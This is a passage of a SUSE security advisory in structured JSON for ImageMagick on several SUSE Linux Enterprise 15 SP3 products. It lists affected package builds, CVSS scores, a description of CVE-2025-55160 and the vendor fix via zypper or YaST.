"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T18:01:34Z",
"details": "important"
}
],
"title": "CVE-2025-55154"
},
{
"cve": "CVE-2025-55160",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55160"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-27 and 7.1.2-1, there is undefined behavior (function-type-mismatch) in splay tree cloning callback. This results in a deterministic abort under UBSan (DoS in sanitizer builds), with no crash in a non-sanitized build. This issue has been patched in versions 6.9.13-27 and 7.1.2-1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55160",
"url": "https://www.suse.com/security/cve/CVE-2025-55160"
},
{
"category": "external",
"summary": "SUSE Bug 1248079 for CVE-2025-55160",
"url": "https://bugzilla.suse.com/1248079"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
